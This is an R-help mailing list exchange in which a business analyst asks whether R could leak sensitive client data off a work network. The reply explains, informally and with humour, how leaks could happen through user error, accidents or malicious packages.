[R] security using R at work

Barry Rowlingson b@row||ng@on @end|ng |rom |@nc@@ter@@c@uk
Wed Aug 8 18:10:30 CEST 2018 

On Wed, Aug 8, 2018 at 4:09 PM, Laurence Clark
<Laurence.Clark using healthmanltd.com> wrote:
> Hello all,
>
> I want to download R and use it for work purposes. I hope to use it to analyse very sensitive data from our clients.
>
> My question is:
>
> If I install R on my work network computer, will the data ever leave our network? I need to know if the data goes anywhere other than our network, because this could compromise it's security.

> Is there is any chance the data could go to a server owned by 'R' or anything else that's not immediately obvious, but constitutes the data leaving our network?

You are talking mostly to statisticians here, and if p>0 then there's
"a chance". I'd say yes, there's a chance, but its pretty small, and
would only occur through stupidity, accident or malice.

 In the ordinary course of things your data will be on your hard disk,
or on your corporate network drives, and only exist between your
corporate network server and your PC's memory. R will load the data
into that memory, do stuff with it in that memory, and write results
back to hard disk. Nothing leaves the network this way.

However... R has facilities for talking to the internet. You can save
data to google docs spreadsheets, for example, but you'd have to be
signed in to google, and have to type something like:

 > writeGoogleDoc(my_data, "secretdata.xls")

that covers "stupid". You should know that google docs are on google's
servers, and google's servers aren't on your network, and your secret
data shouldn't go on google's servers.

Accidents happen. You might be working on non-secret data which you
want to save to google docs, and accidentally save "data1" which is
secret instead of "data2" which is okay to be public. Oops. You sent
it to google. Accidents happen.

"malice" would be if someone had put code into R or an add-on package
that you use that sends your data over the network without you
knowing. For example maybe every time you fit a linear model with:

 lm(age~beauty, data=people)

R could be transmitting the data to hackers. But the chance of this is
very small, and I don't think any malicious code has ever been
discovered in R or the 12000 add-on packages downloadable from CRAN.
Doesn't mean it hasn't been discovered yet or won't be in the future.

It used to be said that the only machine safe from hackers was one
unplugged from the network. But now hackers can get to your machine
via malicious USB sticks, keyboard loggers, and various other nasties.
The only machine safe from hackers is one with the power off. But take
the power plug out because a wake-on-lan packet could switch your
machine on remotely....

Barry







> Thank you
>
> Laurence
>
>
> ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
> Laurence Clark
> Business Data Analyst
> Account Management
> Health Management Ltd
>
> Mobile:                 07584 556498
> Switchboard:    0845 504 1000
> Email:          Laurence.Clark using healthmanltd.com
> Web:            www.healthmanagement.co.uk
>
> ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
> CONFIDENTIALITY NOTICE: This email, including attachments, is for the sole use of the intended recipients and may contain confidential and privileged information or otherwise be protected by law. Any unauthorised review, use, disclosure or distribution is prohibited. If you are not the intended recipient, please contact the sender, and destroy all copies and the original message.<BR><BR>MAXIMUS People Services Limited is registered in England and Wales (registered number: 03752300); registered office: 202 - 206 Union Street, London, SE1 0LX, United Kingdom. The Centre for Health and Disability Assessments Ltd (registered number: 9072343) and Health Management Ltd (registered number: 4369949) are registered in England and Wales. The registered office for each is Ash House, The Broyle, Ringmer, East Sussex, BN8 5NN, United Kingdom. Remploy Limited is registered in England and Wales (registered number: 09457025); registered office: 18c Meridian East, Meridian Business Park, Leicester, Leicestershire, LE19 1WZ, United Kingdom.</font>
> ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
>
>
> ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
>
>
> #####################################################################################
> Scanned by MailMarshal - M86 Security's comprehensive email content security solution.
> Download a free evaluation of MailMarshal at www.m86security.com
> #####################################################################################
>
> ______________________________________________
> R-help using r-project.org mailing list -- To UNSUBSCRIBE and more, see
> https://stat.ethz.ch/mailman/listinfo/r-help
> PLEASE do read the posting guide http://www.R-project.org/posting-guide.html
> and provide commented, minimal, self-contained, reproducible code.

More information about the R-help mailing list